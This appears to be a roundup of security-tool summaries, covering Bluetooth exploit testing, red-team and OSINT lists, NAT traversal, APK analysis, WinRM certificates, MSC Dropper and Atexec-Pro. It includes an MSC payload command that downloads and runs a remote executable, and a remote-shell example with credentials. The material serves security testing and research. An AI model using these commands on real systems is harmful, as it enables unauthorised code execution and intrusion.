Workflow – Comprehensive Guide To Using BlueToolkit For Bluetooth Vulnerability Testing

Because of its modular nature the toolkit can be used in several ways, but its main feature is testing a Bluetooth Classic enabled device for known vulnerabilities.

The modular nature of the toolkit allows a user to test either a specific vulnerability, all of them at once or a specific family of vulnerabilities if the hardware is available.

The vulnerabilities in the arsenal are mainly semi-automated; a few require manual actions from the user.

This is mainly because it is not possible, or too device-specific, to automate the Bluetooth actions of the responding device. Overall the toolkit has the following use cases:

  • Collect reconnaissance information
  • Test one exploit
  • Test all exploits
  • Test all exploits but exclude some
  • Test only specific exploits
  • Save and restore tests from a checkpoint

Typical Workflow

Firstly, it is recommended to collect reconnaissance information from the target device, both to give the toolkit additional data and to run additional analysis. For that, run the following commands:

  • Put the target device in discoverable mode. Alternatively, you can test what kind of information is collected without any interaction from you, when the target device is in discoverable mode, and when the testing and target devices are paired.
  • Get the MAC address of the target device. If needed, use the following guide: LINK_TO_FIND_OUT_MAC_ADDRESS
  • For reconnaissance purposes we need to change the virtual environment:
source /usr/share/BlueToolkit/.venv/bin/activate
  • And then run:
sudo -E env PATH=$PATH bluekit -t AA:BB:CC:DD:EE:FF -r

For more information click here.

Awesome Red Teaming – A Comprehensive Guide To Advanced Security Techniques

Explore the dynamic world of red teaming with our extensive guide designed for cybersecurity professionals and enthusiasts alike.

‘Awesome Red Teaming’ offers a treasure trove of resources, techniques, and tools that are essential for mastering adversarial tactics and strategies.

This living document is continuously updated to keep pace with the latest in Mitre ATT&CK frameworks and beyond.

List of Awesome Red Team / Red Teaming Resources

This list is for anyone wishing to learn about Red Teaming who does not have a starting point.

This is a living resource and will be updated regularly with the latest Adversarial Tactics and Techniques based on Mitre ATT&CK.

You can help by sending Pull Requests to add more information.

Table Of Contents

  • Initial Access
  • Execution
  • Persistence
  • Privilege Escalation
  • Defense Evasion
  • Credential Access
  • Discovery
  • Lateral Movement
  • Collection
  • Exfiltration
  • Command and Control
  • Embedded and Peripheral Devices Hacking
  • Misc
  • RedTeam Gadgets
  • Ebooks
  • Training
  • Certification

For more information click here.

Awesome OSINT – A Comprehensive Resource For Cybersecurity Experts

A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources.

In the intelligence community (IC), the term “open” refers to overt, publicly available sources (as opposed to covert or clandestine sources).

This list is to help all of those who are into Cyber Threat Intelligence (CTI), threat hunting, or OSINT, from beginners to advanced.

Table Of Contents

  • General Search
  • Main National Search Engines
  • Meta Search
  • Specialty Search Engines
  • Visual Search and Clustering Search Engines
  • Similar Sites Search
  • Document and Slides Search
  • File Search
  • Pastebins
  • Code Search
  • Major Social Networks
  • Real-Time Search, Social Media Search, and General Social Media Tools
  • Social Media Tools
    • Twitter
    • Facebook
    • Instagram
    • Pinterest
    • Reddit
    • VKontakte
    • Tumblr
    • LinkedIn
    • Telegram
  • Blog Search
  • Forums and Discussion Boards Search
  • Username Check
  • People Investigations
  • Email Search / Email Check
  • Phone Number Research
  • Vehicle / Automobile Research

For more information click here.

Pwnat : Bridging NAT Barriers Without Port Forwarding

pwnat, by Samy Kamkar, is a tool that allows any client behind a NAT to communicate with a server behind a separate NAT with no port forwarding and no DMZ setup on any routers in order to directly communicate with each other.

There is no middle man, no proxy, no third party, no UPnP required, no spoofing, no DNS tricks. The server does not need to know the client’s IP address before connecting.

More importantly, the client can then connect to any host or port on any remote host or to a fixed host and port decided by the server.

Simply put, this is a proxy server that works behind a NAT, even when the client is also behind a NAT.

usage: ./pwnat <-s | -c> <args>

  -c    client mode
        <args>: [local ip] <local port> <proxy host> [proxy port (def:2222)] <remote host> <remote port>

  -s    server mode
        <args>: [local ip] [proxy port (def:2222)] [[allowed host]:[allowed port] ...]

  -6    use IPv6
  -v    show debug output (up to 2)
  -h    show this help and exit

EXAMPLE

Server side allowing anyone to proxy:

./pwnat -s

Client wanting to connect to google.com:80:

./pwnat -c 8000 pwnat.server.com google.com 80

For more information click here.

CLI Usage : Command-Line Mastery With The BlueKit Toolkit

Explore the comprehensive command-line interface (CLI) of the BlueKit toolkit designed for cybersecurity professionals.

This article delves into the various CLI commands and options available, providing detailed explanations on how to effectively manage and deploy exploits.

Whether you’re checking system setups or running targeted exploits, this guide equips you with the necessary knowledge to leverage the full potential of BlueKit’s capabilities.

usage: bluekit [-h] [-t TARGET] [-l] [-c] [-ct] [-ch] [-v VERBOSITY] [-ex EXCLUDEEXPLOITS [EXCLUDEEXPLOITS ...]] [-e EXPLOITS [EXPLOITS ...]] [-r] [-re] [-rej] [-hh HARDWARE [HARDWARE ...]] ...

positional arguments:
  rest

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target MAC address
  -l, --listexploits    List exploits or not
  -c, --checksetup      Check whether Braktooth is available and setup
  -ct, --checktarget    Check connectivity and availability of the target
  -ch, --checkpoint     Start from a checkpoint
  -v VERBOSITY, --verbosity VERBOSITY
                        Verbosity level
  -ex EXCLUDEEXPLOITS [EXCLUDEEXPLOITS ...], --excludeexploits EXCLUDEEXPLOITS [EXCLUDEEXPLOITS ...]
                        Exclude exploits, example --exclude exploit1, exploit2
  -e EXPLOITS [EXPLOITS ...], --exploits EXPLOITS [EXPLOITS ...]
                        Scan only for provided --exploits exploit1, exploit2; --exclude is not taken into account
  -r, --recon           Run a recon script
  -re, --report         Create a report for a target device
  -rej, --reportjson    Create a report for a target device
  -hh HARDWARE [HARDWARE ...], --hardware HARDWARE [HARDWARE ...]
                        Scan only for provided exploits based on hardware --hardware hardware1 hardware2; --exclude and --exploit are not taken into account

The toolkit could be used to collect reconnaissance information, run individual exploits, run all automated exploits, run specific exploits or exclude some, check the setup, list all available exploits as well as check target devices for availability and pairability.

The toolkit has checkpoints which could be created during the execution if something goes wrong or a user wants to create one.

Then the checkpoints could be used to continue the workflow from a certain point and finish running the exploits.

To get a taste of how to run them it’s recommended to read (Exploitation workflow examples) to get workflow examples with specific commands and manual actions, and (a description of toolkit parameters) for a description of what each parameter is responsible for.

Python3 Change

The toolkit relies on python3.10, which is installed during the installation process; the default python3 alternative is changed to python3.10.

To revert it, execute the following command and pick the python3 installation you want:

sudo update-alternatives --config python3

apkInspector – A Comprehensive Tool For APK Analysis And Evasion Detection

apkInspector is a tool designed to provide detailed insights into the zip structure of APK files, offering the capability to extract content and decode the AndroidManifest.xml file.

What sets apkInspector apart is its adherence to the zip specification during APK parsing, which removes the reliance on external libraries.

This independence allows apkInspector to be highly adaptable, effectively emulating Android's installation process for APKs that cannot be parsed using standard libraries.

The main goal is to enable users to conduct static analysis on APKs that employ evasion techniques, especially when conventional methods prove ineffective.

Please check this blog post for more details.

How To Install

pip install apkInspector

or you can clone this repository and build and install locally:

git clone https://github.com/erev0s/apkInspector.git
cd apkInspector
poetry build
pip install dist/apkInspector-Version_here.tar.gz

CLI

apkInspector offers a command line tool with the same name, with the following options:

$ apkInspector -h
usage: apkInspector [-h] [-apk APK] [-f FILENAME] [-ll] [-lc] [-la] [-e] [-x] [-xa] [-m] [-sm SPECIFY_MANIFEST] [-a] [-v]

apkInspector is a tool designed to provide detailed insights into the zip structure of APK files, offering the capability to extract
content and decode the AndroidManifest.xml file.

options:
  -h, --help            show this help message and exit
  -apk APK              APK to inspect
  -f FILENAME, --filename FILENAME
                        Filename to provide info for
  -ll, --list-local     List all files by name from local headers
  -lc, --list-central   List all files by name from central directory header
  -la, --list-all       List all files from both central directory and local headers
  -e, --export          Export to JSON. What you list from the other flags, will be exported
  -x, --extract         Attempt to extract the file specified by the -f flag
  -xa, --extract-all    Attempt to extract all files detected in the central directory header
  -m, --manifest        Extract and decode the AndroidManifest.xml
  -sm SPECIFY_MANIFEST, --specify-manifest SPECIFY_MANIFEST
                        Pass an encoded AndroidManifest.xml file to be decoded
  -a, --analyze         Check an APK for static analysis evasion techniques
  -v, --version         Retrieves version information
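The -ll and -lc flags above exist because a zip file carries two independent views of its contents: the sequential local file headers and the central directory that an installer actually trusts. The following Python, added here as an illustration and not apkInspector's own code, walks both views directly from the zip specification (no zip library used for parsing) and reports where they disagree. The sample archive, the classes.dex contents and the tampering of one local header name are all constructed for the demo; the walker assumes entries without a trailing data descriptor.

```python
import io
import struct
import zipfile

EOCD_SIG = b"PK\x05\x06"
CEN_SIG = b"PK\x01\x02"
LOC_SIG = b"PK\x03\x04"
CEN_FMT = "<4sHHHHHHIIIHHHHHII"  # 46-byte central directory file header
LOC_FMT = "<4sHHHHHIIIHH"        # 30-byte local file header


def build_sample_apk() -> bytes:
    """Constructed sample: a tiny zip standing in for an APK (not a real app)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + bytes(32))
        zf.writestr("res/values/strings.xml", b"<resources/>")
    return buf.getvalue()


def find_eocd(data: bytes) -> int:
    """Locate the end-of-central-directory record (a comment of up to 65535 bytes may follow it)."""
    start = max(0, len(data) - 22 - 0xFFFF)
    idx = data.rfind(EOCD_SIG, start)
    if idx < 0:
        raise ValueError("no end-of-central-directory record found")
    return idx


def central_directory_entries(data: bytes) -> list:
    """Walk the central directory the way an installer does: EOCD -> CD offset -> entries."""
    eocd = find_eocd(data)
    count, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    entries, pos = [], cd_offset
    for _ in range(count):
        f = struct.unpack_from(CEN_FMT, data, pos)
        if f[0] != CEN_SIG:
            raise ValueError(f"bad central directory signature at offset {pos}")
        nlen, elen, clen = f[10], f[11], f[12]
        name = data[pos + 46: pos + 46 + nlen].decode("utf-8", "replace")
        entries.append({"name": name, "method": f[4], "crc": f[7],
                        "csize": f[8], "local_offset": f[16]})
        pos += 46 + nlen + elen + clen
    return entries


def local_header_entries(data: bytes) -> list:
    """Walk local file headers sequentially from offset 0, ignoring the central directory."""
    entries, pos = [], 0
    while data.startswith(LOC_SIG, pos):
        f = struct.unpack_from(LOC_FMT, data, pos)
        flags, method, crc, csize, nlen, elen = f[2], f[3], f[6], f[7], f[9], f[10]
        name = data[pos + 30: pos + 30 + nlen].decode("utf-8", "replace")
        entries.append({"name": name, "method": method, "crc": crc, "csize": csize, "offset": pos})
        if flags & 0x8 and csize == 0:
            break  # sizes live in a trailing data descriptor; not handled here (assumption)
        pos += 30 + nlen + elen + csize
    return entries


def compare_headers(data: bytes) -> list:
    """Report every disagreement between the central directory and the local headers."""
    findings = []
    central = central_directory_entries(data)
    local_by_offset = {e["offset"]: e for e in local_header_entries(data)}
    for c in central:
        loc = local_by_offset.get(c["local_offset"])
        if loc is None:
            findings.append(f"{c['name']}: central directory points at offset "
                            f"{c['local_offset']} with no local header there")
            continue
        for key in ("name", "method", "crc"):
            if c[key] != loc[key]:
                findings.append(f"{c['name']}: {key} differs "
                                f"(central={c[key]!r}, local={loc[key]!r})")
    referenced = {c["local_offset"] for c in central}
    for off, loc in local_by_offset.items():
        if off not in referenced:
            findings.append(f"{loc['name']}: local header at offset {off} "
                            f"is not listed in the central directory")
    return findings


def tamper_local_name(data: bytes, old: str, new: str) -> bytes:
    """Constructed tampering for the demo: rewrite one local header filename so it no longer
    matches the central directory (same length, so all offsets stay valid)."""
    assert len(old) == len(new)
    entry = next(c for c in central_directory_entries(data) if c["name"] == old)
    start = entry["local_offset"] + 30
    return data[:start] + new.encode() + data[start + len(old):]


if __name__ == "__main__":
    clean = build_sample_apk()
    print("clean archive findings:", compare_headers(clean))
    tampered = tamper_local_name(clean, "classes.dex", "classes.dez")
    for line in compare_headers(tampered):
        print("tampered archive:", line)
```

On the clean archive the two views agree and no findings are reported; on the tampered copy a library that lists files from local headers shows classes.dez while the central directory, which is what the installer follows, still says classes.dex. Any such disagreement is worth a closer look during static analysis, since it means different parsers will see different contents.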

For more information click here.

WinRM Client Certificate Authentication : Step-By-Step Setup And Configuration Guide

This repo demonstrates how to create certificates for WinRM/WSMan client certificate authentication and how to configure Windows on the service side to accept those certificates for client authentication.

It has some Ansible playbooks that can be used to do all the necessary steps plus some standalone scripts and background information to help you understand how certificate authentication works and is configured.

Background

WinRM authentication is typically done through the Negotiate protocol which attempts to use Kerberos authentication before falling back to NTLM.

It is possible to use client certificates through the TLS X.509 client certificate authentication but the documentation around this is hard to come by and hard to understand.

This repo will attempt to show how to both generate those certificates and how to configure the Windows host to use them for authentication.

It will also show how those certificates can be used in Ansible to perform certificate authentication.

Please keep in mind that certificate authentication does have its downsides, such as:

  • it can only be mapped to a local Windows user, no domain accounts
  • the username and password must be mapped to the certificate, if the password changes, the cert will need to be re-mapped
  • an administrator on the Windows host can retrieve the local user password through the certificate mapping
  • the HTTP libraries used by psrp and winrm do not support
    • encrypted private keys, they must be stored without encryption
    • certs and private keys stored as a var, they must be a file

Usually these points are blockers (the last one especially) but if you are still interested then read on.

Requirements

  • Windows host with a HTTPS WinRM listener configured
  • Ansible collections
    • ansible.windows – Used to configure the Windows host
    • community.crypto – Used in setup_certificate.yml
  • Python libraries winrm and psrp for testing the connection

To install the Python libraries we can run:

python3 -m pip install pypsrp winrm

To install the required collections run

ansible-galaxy collection install -r requirements.yml

If you are not using setup_certificate.yml to generate the certificates, then community.crypto will not be needed.

How To Run

Before running we need to add in the inventory details for our Windows host. Edit inventory.ini and add the Windows host hostname/IP under the [windows] section. Also set the ansible_user and ansible_password value under the [windows:vars] section. We can verify that it worked by running ansible -i inventory.ini windows -m ansible.windows.win_ping.

Once the inventory has been setup we run the following playbooks with the CERT_USER set to the Windows user we want to create that’s mapped to the certificate:

CERT_USER=AnsibleCertUser
ansible-playbook -i inventory.ini setup_certificate.yml -e username=$CERT_USER
ansible-playbook -i inventory.ini setup_windows.yml -e username=$CERT_USER

For more information click here.

MSC Dropper – A Python Tool For Custom MSC File Creation And Payload Execution

MSC Dropper is a Python script designed to automate the creation of MSC (Microsoft Management Console) files with customizable payloads for arbitrary execution.

This tool leverages a method discovered by Samir (@SBousseaden) from Elastic Security Labs, termed #GrimResource, which facilitates initial access and evasion through mmc.exe.

Overview

The script allows users to generate MSC files that can execute arbitrary commands or scripts within the Microsoft Management Console environment.

This capability is particularly useful for security research and testing environments.

Features

  • Automated MSC File Generation: Create MSC files with specified commands or scripts embedded.
  • Payload Customization: Customize the payload to execute any command or script that mmc.exe can invoke.
  • Command-Line Interface: Simple command-line interface for quick generation of MSC files.

Installation

Clone the repository:

git clone https://github.com/ZERODETECTION/MSC_Dropper.git

Usage

Generating An MSC File

To generate an MSC file with a specific command or script:

python msc_dropper.py template1.msc out.msc "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe"

Replace "cmd /c curl -O http://wslab.de/tools/messagebox.exe && messagebox.exe" with the command or script you want to execute. Ensure that the command is formatted correctly to work within the Windows environment and mmc.exe.

Customizing Payloads

You can customize the payload directly within the template1.msc file or modify the script to automate more complex payload generation.

Atexec-Pro : Advanced Features And Usage For Remote Command Execution

Modified based on atexec.py.

The TSCH interface is used by default (it needs port 135 and a dynamic high port); port 445 is no longer required.

The ATSVC interface needs port 445.

The technique is mainly based on this article by zcgonvh.

Features

  • CMD command execute
  • PS command execute
  • File Upload
  • File Download
  • .Net assembly execute
  • Support ATSVC and TSCH interface.

Note: the upload, download and execute-assembly functions currently only support files up to 1MB in size. None of the functions bypass AMSI.

Usage

usage: atexec-pro.py [-h] [-i {TSCH,ATSVC}] [-session-id SESSION_ID] [-ts] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
                     [-dc-ip ip address] [-keytab KEYTAB]
                     target

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>

options:
  -h, --help            show this help message and exit
  -i {TSCH,ATSVC}, --interface {TSCH,ATSVC}
                        Interface to use.
  -session-id SESSION_ID
                        an existed logon session to use (no output, no cmd.exe)
  -ts                   adds timestamp to every logging output
  -debug                Turn DEBUG output ON
  -codec CODEC          Sets encoding used (codec) from the target's output (default "utf-8"). If errors are detected, run chcp.com at the target, map the result with
                        https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found,
                        it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -keytab KEYTAB        Read keys for SPN from keytab file

Example

GetShell

python atexec-pro.py localhost/administrator:123@10.211.55.3

Project Horus – The Comprehensive Toolkit For Investigation Assistance

Project Horus, your ultimate pre-operations tool tailored for enhancing investigation processes.

This comprehensive toolkit leverages advanced APIs and data compilation strategies to streamline your investigative workflow.

Whether you’re a security professional or a tech enthusiast, Horus equips you with the necessary tools to elevate your analytical capabilities.

Table of Contents

  • 🚀 About Horus
  • ⚡ Installation and Usage Instructions
  • ⚙️ API Configuration
  • 🔮 Intended Features
  • 🤝 Current Maintainers
  • 🛠️ Contributing
  • 📧 Contact Me
  • 🤝 Acknowledgements

🚀 About Horus

Horus is an all-in-one tool for investigation assistance, from leveraging APIs to compiling data. It's your pre-ops buddy!

⚡ Installation And Usage Instructions

To get started with this project, you will need Python installed on your device. Once it is installed, follow these steps:

  1. Clone this repository.
  2. cd to the ‘horus’ directory. (Make sure it isn’t the outermost folder)
  3. Install dependencies using the following command: pip install -r requirements.txt
  4. In the ‘horus’ directory, run python3 horus.py on Linux/MacOS, or py horus.py on Windows

Note: protonvpn-cli is a requirement for the ‘pvpn’ command

⚙️ API Configuration

To configure the APIs necessary for usage of certain commands, you can either manually enter them, or use the ‘apicon’ command

To manually configure API keys, navigate to /src/modules/var/pipes/api_config.json. Enter your API keys in their corresponding entries.

⚠️ Warning: If you are contributing to this repository or are testing it through a public fork, make sure to remove your API keys from the JSON file before pushing changes.

🔮 Intended Features

🟢 = Fully implemented or more than 80% done

🟡 = Partially implemented / In development

🔴 = To be implemented

For more information click here.